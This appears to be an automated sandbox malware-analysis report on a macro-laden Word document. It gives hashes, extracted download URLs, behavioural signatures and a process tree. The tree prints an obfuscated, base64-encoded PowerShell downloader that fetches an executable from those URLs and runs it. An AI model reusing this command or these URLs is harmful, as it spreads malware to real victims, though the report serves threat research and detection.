Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
13-09-2024 08:27
Static task
static1
Behavioral task
behavioral1
Sample
de0d8b18c966010991edbdb758bbbdb6_JaffaCakes118.doc
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
de0d8b18c966010991edbdb758bbbdb6_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
de0d8b18c966010991edbdb758bbbdb6_JaffaCakes118.doc
-
Size
151KB
-
MD5
de0d8b18c966010991edbdb758bbbdb6
-
SHA1
c31795d52a9350f9c9189d4cf5c3180b53dd45a7
-
SHA256
7e348cbf0bb85b15e9f742193f2073ad5cd0cda176a4f0da91a947f9bcb54b6b
-
SHA512
09db5b59600f1ee7c09ef784aa69a95d602df2e22ea30a622b41d2328b3c3914cb6a9b846be17e53bec95879a9b10ad770e663d8cda79b6d0a471d8c1c2714e7
-
SSDEEP
1536:8H1DB445TEgrO3jSWAg83tle1ZZ0293QM0eetR2cOupLB5UZ5J+a9DiYFHC3qoXe:O22TWTogk079THcpOu5UZJVdCVtBQoy
Malware Config
Extracted
http://priyamcollection.com/cab/f/
http://querofornecedores.com/wp-includes/images/D/
https://hulianwang114.com/attachment/c/
http://ixirhost.xyz/wp-content/z/
https://weneedyourhelpnow.org/wp-content/LJ/
https://averyair.com/wp-content/J/
https://drippglobal.com/wp-content/rV/
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 7 2152 POWeRsHeLL.exe 10 2152 POWeRsHeLL.exe 11 2152 POWeRsHeLL.exe 13 2152 POWeRsHeLL.exe 14 2152 POWeRsHeLL.exe 16 2152 POWeRsHeLL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POWeRsHeLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\TypeLib\{689A5C95-F5EF-46ED-9F33-B08717A6EC07}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\TypeLib\{689A5C95-F5EF-46ED-9F33-B08717A6EC07}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{689A5C95-F5EF-46ED-9F33-B08717A6EC07}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\TypeLib\{689A5C95-F5EF-46ED-9F33-B08717A6EC07}\2.0\FLAGS WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{689A5C95-F5EF-46ED-9F33-B08717A6EC07}\2.0\0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2172 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2152 POWeRsHeLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2152 POWeRsHeLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2172 WINWORD.EXE 2172 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2172 wrote to memory of 1640 2172 WINWORD.EXE 35 PID 2172 wrote to memory of 1640 2172 WINWORD.EXE 35 PID 2172 wrote to memory of 1640 2172 WINWORD.EXE 35 PID 2172 wrote to memory of 1640 2172 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\de0d8b18c966010991edbdb758bbbdb6_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHeLL.exePOWeRsHeLL -ENCOD JABaADEAaQBjAGMANQBwAD0AKAAoACcATQBjAF8AJwArACcANQBrACcAKQArACcAegAnACsAJwBlACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgBWADoAVQBTAEUAUgBQAHIATwBmAGkAbABFAFwAYwBlAGQAMwA1ADMAQwBcAFYAUAB2AGUASQBMAFcAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIARQBDAFQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAHUAcgBJAHQAWQBgAFAAYABSAE8AYABUAGAAbwBjAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzACcAKQArACcAMQAyACcAKwAoACcALAAnACsAJwAgAHQAJwApACsAKAAnAGwAcwAxACcAKwAnADEAJwApACsAKAAnACwAIAAnACsAJwB0ACcAKQArACcAbABzACcAKQA7ACQAUgA1ADgAZAByADEAdAAgAD0AIAAoACcAUAAnACsAKAAnADEAbQB2ACcAKwAnAGoAJwApACsAJwA1AHoAJwApADsAJABJADEAeAA2AG0AbgBxAD0AKAAoACcARgAnACsAJwB4AGQAMwBzAHIAJwApACsAJwBnACcAKQA7ACQAUwBvAGQAcgBqADgAcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAfQBDAGUAJwArACcAZAAzACcAKwAnADUAMwBjAHsAMAB9AFYAcAB2AGUAaQAnACsAJwBsAHcAJwArACcAewAwACcAKwAnAH0AJwApAC0ARgBbAGMAaABBAHIAXQA5ADIAKQArACQAUgA1ADgAZAByADEAdAArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQAUwBfAGoAMgA0AGoAZAA9ACgAKAAnAEgAZgB0AHMAJwArACcAMAAnACkAKwAnAGEAYQAnACkAOwAkAFEAdwBoADkAcQBmAGsAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAEkARQBOAFQAOwAkAEEAXwAyAHkAeABoADMAPQAoACcAaAB0ACcAKwAoACcAdAAnACsAJwBwACcAKwAnADoALwAvAHAAcgBpACcAKQArACgAJwB5AGEAbQBjAG8AJwArACcAbAAnACkAKwAnAGwAJwArACgAJwBlAGMAdABpAG8AJwArACcAbgAuAGMAbwBtAC8AYwBhACcAKwAnAGIAJwArACcALwBmACcAKwAnAC8AKgBoAHQAdABwADoALwAvACcAKwAnAHEAdQBlAHIAbwBmAG8AcgBuAGUAYwBlACcAKwAnAGQAJwArACcAbwByAGUAcwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAnACsAJwAtAGkAbgBjAGwAdQBkAGUAJwArACcAcwAvAGkAbQBhAGcAZQAnACsAJwBzAC8ARAAvACcAKQArACcAKgBoACcAKwAnAHQAJwArACgAJwB0AHAAJwArACcAcwA6ACcAKQArACgAJwAvAC8AaAAnACsAJwB1ACcAKwAnAGwAaQBhAG4AJwArACcAdwAnACkAKwAoACcAYQAnACsAJwBuAGcAMQAnACkAKwAoACcAMQA0AC4AJwArACcAYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AYQB0AHQAJwArACcAYQAnACkAKwAnAGMAaAAnACsAKAAnAG0AJwArACcAZQBuACcAKQArACgAJwB0ACcAKwAnAC8AYwAvACcAKwAnACoAaAB0ACcAKQArACgAJwB0AHAAJwArACcAOgAvAC8AaQB4ACcAKQArACgAJwBpAHIAJwArACcAaABvACcAKwAnAHMAdAAuAHgAeQB6AC8AJwArACcAdwBwACcAKwAnAC0AYwBvACcAKQArACcAbgB0ACcAKwAoACcAZQBuACcAKwAnAHQAJwApACsAJwAvACcAKwAnAHoAJwArACcALwAqACcAKwAoACcAaAAnACsAJwB0ACcAKwAnAHQAcABzADoALwAvAHcAZQBuACcAKQArACgAJwBlACcAKwAnAGUAZAAnACkAKwAoACcAeQAnACsAJwBvAHUAcgAnACsAJwBoAGUAbABwAG4AJwArACcAbwB3AC4AbwByAGcALwB3AHAAJwArACcALQAnACsAJwBjAG8AJwArACcAbgB0AGUAbgAnACkAKwAoACcAdAAvACcAKwAnAEwASgAnACsAJwAvACoAaAB0ACcAKwAnAHQAcABzACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAnAGEAdgAnACsAKAAnAGUAcgB5AGEAaQAnACsAJwByAC4AJwArACcAYwBvAG0AJwApACsAKAAnAC8AdwBwACcAKwAnAC0AYwBvAG4AJwArACcAdABlACcAKQArACgAJwBuAHQALwAnACsAJwBKAC8AJwArACcAKgBoAHQAdAAnACkAKwAnAHAAJwArACcAcwA6ACcAKwAnAC8ALwAnACsAJwBkACcAKwAoACcAcgAnACsAJwBpAHAAJwApACsAKAAnAHAAZwBsAG8AYgAnACsAJwBhACcAKQArACgAJwBsAC4AJwArACcAYwBvAG0ALwAnACkAKwAoACcAdwBwACcAKwAnAC0AYwBvACcAKQArACgAJwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AcgBWACcAKwAnAC8AJwApACkALgAiAHMAcABsAGAASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQQBrADIAbgBnAHYAMwA9ACgAKAAnAFEAdwAnACsAJwB3AHgAJwApACsAKAAnAHYAbQAnACsAJwA5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQARABlAF8AcQAxAG0AdwAgAGkAbgAgACQAQQBfADIAeQB4AGgAMwApAHsAdAByAHkAewAkAFEAdwBoADkAcQBmAGsALgAiAGQAbwB3AG4AbABPAGAAQQBgAEQARgBJAEwARQAiACgAJABEAGUAXwBxADEAbQB3ACwAIAAkAFMAbwBkAHIAagA4AHMAKQA7ACQATgBjADgAagB2ADkAZgA9ACgAJwBQACcAKwAoACcAcwB1ACcAKwAnAGcAJwApACsAKAAnADYAOQAnACsAJwBwACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAFMAbwBkAHIAagA4AHMAKQAuACIAbABlAGAATgBHAHQAaAAiACAALQBnAGUAIAAyADMANgA3ADIAKQAgAHsALgAoACcASQBuAHYAbwBrAGUALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAoACQAUwBvAGQAcgBqADgAcwApADsAJABZADIAaAAxADUAZQBlAD0AKAAnAEQAJwArACgAJwBlAGcAeAAnACsAJwBxACcAKQArACcAdQAwACcAKQA7AGIAcgBlAGEAawA7ACQASwAwADgAZQAzAHYAZAA9ACgAKAAnAFMAMgAnACsAJwB6ACcAKQArACcAYQB3ACcAKwAnAGsAegAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAYQB5AHYAMQBwADEAPQAoACcAVQAnACsAKAAnAGIAJwArACcAcAA1ADAAbwAnACsAJwBnACcAKQApAA==1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD50d5e2a930a8814386a191126db88a48d
SHA15a6a05b9d7d2c827647ccae0ecca4dac4ead5ca8
SHA256182289c352ec718f492bfb93d579a390a9e97b6184fd2de94fc35abb5c93c9e1
SHA512b9f28adfb7c88f729d3889edd7dd231cce358afcae760dad1e21dc54db2b5d986cdd9709648322c0bb9a70352d954611bc5d2a2fc95c48ed7a1951248e62c54a